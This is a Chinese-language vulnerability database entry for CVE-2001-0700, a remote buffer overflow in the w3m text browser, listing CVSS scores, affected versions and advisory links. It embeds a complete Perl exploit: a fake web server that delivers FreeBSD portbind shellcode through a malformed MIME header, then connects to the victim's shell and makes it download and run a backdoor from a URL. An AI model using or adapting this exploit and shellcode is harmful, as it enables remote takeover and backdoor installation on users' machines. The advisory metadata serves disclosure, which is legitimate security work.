CVE-2001-0700
CVSS7.5
发布时间 :2001-09-20 00:00:00
修订时间 :2008-09-05 16:24:43
NMCOE    

[原文]Buffer overflow in w3m 0.2.1 and earlier allows a remote attacker to execute arbitrary code via a long base64 encoded MIME header.


[CNNVD]w3m缓冲区溢出漏洞(CNNVD-200109-099)

        w3m 0.2.1以及之前版本存在缓冲区溢出漏洞。远程攻击者借助超长Base64编码MIME头执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:w3m:w3m:0.1.10
cpe:/a:w3m:w3m:0.1.7
cpe:/a:w3m:w3m:0.2
cpe:/a:w3m:w3m:0.1.8
cpe:/a:w3m:w3m:0.2.1
cpe:/a:w3m:w3m:0.1.6
cpe:/a:w3m:w3m:0.1.9
cpe:/a:w3m:w3m:0.1.3
cpe:/a:w3m:w3m:0.1.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0700
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0700
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-099
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6725.php
(VENDOR_ADVISORY)  XF  w3m-mime-header-bo(6725)
http://www.securityfocus.com/bid/2895
(VENDOR_ADVISORY)  BID  2895
http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200106.month/537.html
(VENDOR_ADVISORY)  CONFIRM  http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200106.month/537.html
http://www.securityfocus.com/archive/1/192371
(UNKNOWN)  BUGTRAQ  20010621 [SNS Advisory No.32] w3m malformed MIME header Buffer Overflow Vulnerability
http://www.debian.org/security/2001/dsa-081
(UNKNOWN)  DEBIAN  DSA-081
http://www.debian.org/security/2001/dsa-064
(UNKNOWN)  DEBIAN  DSA-064
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000434
(UNKNOWN)  CONECTIVA  CLA-2001:434

- 漏洞信息

w3m缓冲区溢出漏洞
高危 缓冲区溢出
2001-09-20 00:00:00 2005-05-02 00:00:00
远程  
        w3m 0.2.1以及之前版本存在缓冲区溢出漏洞。远程攻击者借助超长Base64编码MIME头执行任意代码。

- 公告与补丁

        

- 漏洞信息 (20941)

W3M 0.1/0.2 Malformed MIME Header Buffer Overflow Vulnerability (EDBID:20941)
freebsd remote
2001-06-19 Verified
0 White_E
N/A [点击下载]
source: http://www.securityfocus.com/bid/2895/info

W3M is a pager/text-based WWW browser similiar to lynx.

A buffer overflow vulnerability exists in the 'w3m' client program. The overflow occurs when a base64-encoded string exceeding approximately 32 characters in length is received in a MIME header field. As a result, it may be possible for a malicious remote server to execute arbitrary code on a user's system. 

#!/usr/bin/perl

# ---- exp_w3m.pl
# w3m remote buffer overflow exploit for FreeBSD.
# this fake httpd gives exploit code to visitor's w3m, then
# connects to victim's port 10000, downloads backdoor from
# $backdoor, and executes it.
# see also:
# ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:46.w3m.asc
# 
# 					White_E <white_e@bigfoot.com>
# 					http://ttj.virtualave.net/

$backdoor='http://www.../any.backdoor.prog.you.want';
$ret = 0xbfbffa2c;
$ret -= $ARGV[0];
$retb = pack("V",$ret); # little endian

$shellcode= # http://www.hack.co.za/download.php?sid=1444
            # portbind shell on 10000 by bighawk
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89".
"\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50".
"\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53".
"\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53".
"\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69".
"\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; # 86 bytes

use Socket;
$port=80;
$|=1;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
select(S);$|=1;select(STDOUT);
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
$paddr=sockaddr_in($port,INADDR_ANY);
bind(S,$paddr) || die "ERR: bind()\n";
listen(S,SOMAXCONN) || die "ERR: listen()\n";
print "listen on $port.\n";
$str  = "A" x 36;
$str .= $retb;
$str .= "\x90" x 128;
$str .= $shellcode;

while (1) {
  $victim=accept(VIC,S);
  $vaddr=(sockaddr_in($victim))[1];
  select(VIC);$|=1;select(STDOUT);
  $in=<VIC>;
  $in=<VIC>;
  print VIC "HTTP/1.0 200 OK\r\n";
  print VIC "MIME-Version: 1.0\r\n";
  print VIC "Content-Type: multipart/mixed; boundary=\"__=?$str\r\n";
  print VIC "\r\n";
  sleep(1);
  socket(BD,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
  $paddr=sockaddr_in('10000',$vaddr) || die "ERR: sockaddr_in\n";
  connect(BD,$paddr) || die "ERR: connect()\n";
  select(BD);$|=1;select(STDOUT);
  print BD "/usr/local/bin/w3m -dump_source $backdoor > /tmp/hoge \; /bin/chmod +x /tmp/hoge \; 
/tmp/hoge & \n";
  print "backdoor has been set.\n";
  close(BD);
}
		

- 漏洞信息

1876
w3m base64 MIME Header Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-06-21 Unknow
2001-06-21 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站